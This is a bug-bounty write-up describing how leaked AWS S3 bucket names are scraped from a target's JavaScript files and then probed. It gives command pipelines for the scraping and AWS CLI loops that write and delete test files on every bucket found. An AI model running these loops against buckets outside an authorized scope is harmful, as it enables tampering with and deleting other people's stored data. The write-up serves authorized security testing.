How I Was Able to Find Mass Leaked AWS S3 Buckets from JS Files
My name is Santosh Kumar Sha, and I'm a security researcher from India (Assam). In this article, I will describe how I was able to find mass leaked AWS S3 buckets from JS files.
SPECIAL COVID-19 Note:
Don't go outside without a reason. Stay home, be safe, and keep others safe too. A special request to my fellow bug-bounty hunters: take care of your health and get vaccinated.
TOOLS used for the exploitation
1. subfinder (https://github.com/projectdiscovery/subfinder)
2. httpx (https://github.com/projectdiscovery/httpx)
3. gau, by Corben (https://github.com/lc/gau)
4. waybackurls, by tomnomnom (https://github.com/tomnomnom/waybackurls)
5. subjs (https://github.com/lc/subjs)
Story Behind the bug:
This is the write-up of a recent bug I found while doing recon on JS files: how I was able to find mass leaked AWS S3 buckets from a target's JavaScript.
Here it goes:
Suppose the target is example.com and everything is in scope, like this:
In-scope: *.example.com
To gather all the subdomains and their JS files from internet archives, I used subfinder, waybackurls, and gau.
subfinder -d example.com -silent | httpx | subjs
gau -subs example.com | grep '\.js$'
waybackurls example.com | grep '\.js$'
There is still a chance of missing JS files, so to stay ahead of the game I also piped subfinder into httpx and subjs to pull the JS files from every live subdomain, and saved everything to files.
So the final command will look like this:
gau -subs example.com | grep '\.js$' >> vul1.txt
waybackurls example.com | grep '\.js$' >> vul2.txt
subfinder -d example.com -silent | httpx | subjs >> vul3.txt
Now collect all the JS file URLs into one file and sort out the duplicates:
cat vul1.txt vul2.txt vul3.txt | sort -u >> unique_sub.txt
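To illustrate what the dedup step does, here is a tiny offline sketch with made-up file names and URLs (overlapping on purpose, so `sort -u` has something to remove):

```shell
# Two sample URL lists that share one entry (all URLs are hypothetical)
printf '%s\n' 'https://a.example.com/app.js' 'https://b.example.com/main.js' > /tmp/vul1.txt
printf '%s\n' 'https://b.example.com/main.js' 'https://c.example.com/x.js'   > /tmp/vul2.txt

# Merge and deduplicate, exactly as in the pipeline above
unique=$(cat /tmp/vul1.txt /tmp/vul2.txt | sort -u)
echo "$unique"
```

Four input lines collapse to three unique URLs, since the duplicate appears only once in the output.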
Now the actual JS file recon starts:
JS files hold a huge amount of data, and JS recon is a time-consuming task: reading each file one by one to filter out information about the target is practically impossible at scale. So I used my bash skills to extract data from every file at once: curl fetches each file and grep pulls out any leaked AWS S3 bucket referenced inside it. The syntax I used is below.
cat unique_sub.txt | xargs -I% bash -c 'curl -sk "%" | grep -oE "[a-zA-Z0-9.-]+\.s3\.amazonaws\.com"' >> s3_bucket.txt
cat unique_sub.txt | xargs -I% bash -c 'curl -sk "%" | grep -oE "[a-zA-Z0-9.-]+\.s3\.us-east-2\.amazonaws\.com"' >> s3_bucket.txt
cat unique_sub.txt | xargs -I% bash -c 'curl -sk "%" | grep -oE "s3\.amazonaws\.com/[a-zA-Z0-9.-]+"' >> s3_bucket.txt
cat unique_sub.txt | xargs -I% bash -c 'curl -sk "%" | grep -oE "s3\.us-east-2\.amazonaws\.com/[a-zA-Z0-9.-]+"' >> s3_bucket.txt
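The four greps above can also be collapsed into a single extended regex that catches both virtual-hosted (`bucket.s3.amazonaws.com`) and path-style (`s3.region.amazonaws.com/bucket`) URLs in any region. A minimal offline sketch of that pattern, run against a made-up JS snippet rather than a live curl download:

```shell
# Sample JS content standing in for a downloaded file (URLs are hypothetical)
js='var cfg = {u: "https://assets-prod.s3.amazonaws.com/app.js", b: "https://s3.us-east-2.amazonaws.com/backup-dev/x"};'

# One regex for both virtual-hosted and path-style S3 URLs, any region
matches=$(echo "$js" | grep -hoE '([a-z0-9.-]+\.s3([.-][a-z0-9-]+)?\.amazonaws\.com|s3([.-][a-z0-9-]+)?\.amazonaws\.com/[a-z0-9.-]+)')
echo "$matches"
```

In a real run you would replace the `echo "$js"` with `curl -sk "%"` inside the xargs loop, as in the commands above.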
All the AWS S3 bucket URLs are now collected in s3_bucket.txt. Next, we extract the bucket names from those URLs. Below are the commands to pull the bucket name out of each URL (or you can clean them up manually).
cat s3_bucket.txt | sed 's/\.s3\.amazonaws\.com.*//' >> bucket_name.txt
cat s3_bucket.txt | sed 's/\.s3\.us-east-2\.amazonaws\.com.*//' >> bucket_name.txt
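If s3_bucket.txt mixes virtual-hosted and path-style entries, a single sed pass with two expressions can normalize both into bare bucket names. A sketch with hypothetical sample data (not the author's original commands):

```shell
# Hypothetical lines as they might appear in s3_bucket.txt
printf '%s\n' \
  'assets-prod.s3.amazonaws.com' \
  's3.us-east-2.amazonaws.com/backup-dev' > /tmp/s3_demo.txt

# Expr 1 strips the endpoint suffix from virtual-hosted names;
# expr 2 strips the endpoint prefix from path-style names
names=$(sed -E -e 's/\.s3[.-]?[a-z0-9-]*\.?amazonaws\.com.*//' \
               -e 's#^s3[.-]?[a-z0-9-]*\.?amazonaws\.com/##' /tmp/s3_demo.txt | sort -u)
echo "$names"
```

Both styles reduce to plain bucket names (`assets-prod`, `backup-dev`), ready for the AWS CLI step below.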
Now, how I was able to find mass AWS S3 buckets with write and delete permissions:
Here is how I automated scanning the S3 buckets for write and delete permissions.
I had already collected the bucket names from the JS files into a file named "bucket_name.txt".
Now, using the AWS CLI, we automate the process:
cat bucket_name.txt | xargs -I% sh -c 'aws s3 cp test.txt s3://% 2>&1 | grep "upload" && echo "AWS s3 bucket takeover by cli %"'
cat bucket_name.txt | xargs -I% sh -c 'aws s3 rm s3://%/test.txt 2>&1 | grep "delete" && echo "AWS s3 bucket takeover by cli %"'
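To see what that loop expands to without touching AWS, here is a dry-run sketch that only prints the `aws s3 cp` and `aws s3 rm` commands it would execute (the bucket names are hypothetical):

```shell
# Hypothetical bucket names, as produced by the extraction step
printf '%s\n' 'backup-dev' 'assets-prod' > /tmp/bucket_demo.txt

# Dry run: print the commands instead of running them against AWS
cmds=$(while read -r b; do
  echo "aws s3 cp test.txt s3://$b"
  echo "aws s3 rm s3://$b/test.txt"
done < /tmp/bucket_demo.txt)
echo "$cmds"
```

When a `cp` succeeds, the CLI prints an "upload:" line, and a successful `rm` prints a "delete:" line, which is what the greps above key on. Be careful to only run this against buckets that are in scope for your program.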
I finally got 6 more AWS S3 buckets with write and delete permission.
I quickly reported the bug, and the next day the report was triaged as critical.
After seeing this, my reaction…
I'm sure many security researchers already know this process, but this is how I approach finding mass leaked AWS S3 buckets from JS files. Recon really pays off; you never know what you might be missing out on.
That's one of the reasons I wanted to share my experience, and also to highlight other techniques for exploiting such a vulnerability.